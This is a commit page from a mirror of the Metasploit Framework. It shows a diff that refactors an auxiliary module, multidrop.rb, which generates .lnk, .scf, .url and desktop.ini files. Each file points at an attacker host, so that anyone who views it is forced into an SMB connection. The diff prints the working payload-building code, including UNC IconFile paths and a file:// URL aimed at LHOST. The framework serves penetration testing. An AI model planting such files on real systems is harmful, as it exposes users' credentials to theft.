infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated Code 

Updated code with suggestions provided by bcoles
GSoC/Meterpreter_Web_Console
rmdavy 2018-06-01 11:13:40 +01:00 committed by GitHub
parent abe04edd10
commit 061bb84a5a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
modules/auxiliary/multidrop.rb
View File

@ -16,10 +16,17 @@ class MetasploitModule < Msf::Auxiliary
a .lnk, .scf, .url, desktop.ini file which includes a reference
to the the specified remote host, causing SMB connections to be initiated
from any user that views the file.
Lnk file creation code taken from module droplnk.rb by Mubix
},
'License' => MSF_LICENSE,
'Author' => [ 'Richard Davy - secureyourit.co.uk' ],
'Author' => [ 'Richard Davy - secureyourit.co.uk, Lnk Creation Code by Mubix' ],
'Platform' => [ 'win' ],
'References' =>
[
['URL', 'https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018'],
['URL', 'https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/']
]
))
register_options(
@ -32,20 +39,20 @@ class MetasploitModule < Msf::Auxiliary
def run
if datastore['FILENAME'].chars.last(3).join=="lnk"
createlnk()
createlnk
elsif datastore['FILENAME'].chars.last(3).join=="scf"
createscf()
createscf
elsif datastore['FILENAME']=="desktop.ini"
create_desktopini()
create_desktopini
elsif datastore['FILENAME'].chars.last(3).join=="url"
create_url()
create_url
end
end
def createlnk()
#Code below taken from module written by Mubix
def createlnk
#Code below taken from module droplnk.rb written by Mubix
lnk = ""
lnk << "\x4c\x00\x00\x00" #Header size
lnk << "\x01\x14\x02\x00\x00\x00\x00\x00" #Link CLSID
@ -102,31 +109,31 @@ class MetasploitModule < Msf::Auxiliary
file_create(lnk)
end
def createscf()
def createscf
scf=""
scf << "[Shell]\n"
scf << "Command=2\n"
scf << "IconFile=\\\\"+datastore['LHOST']+"\\test.ico\n"
scf << "IconFile=\\\\#{datastore['LHOST']}\\test.ico\n"
scf << "[Taskbar]\n"
scf << "Command=ToggleDesktop"
file_create(scf)
end
def create_desktopini()
def create_desktopini
ini=""
ini << "[.ShellClassInfo]\n"
ini << "IconFile=\\\\"+datastore['LHOST']+"\\icon.ico\n"
ini << "IconFile=\\\\#{datastore['LHOST']}\\icon.ico\n"
ini << "IconIndex=1337"
file_create(ini)
end
def create_url()
def create_url
url=""
url << "[InternetShortcut]\n"
url << "URL=file://"+datastore['LHOST']+"/url.html"
url << "URL=file://#{datastore['LHOST']}/url.html"
file_create(url)
end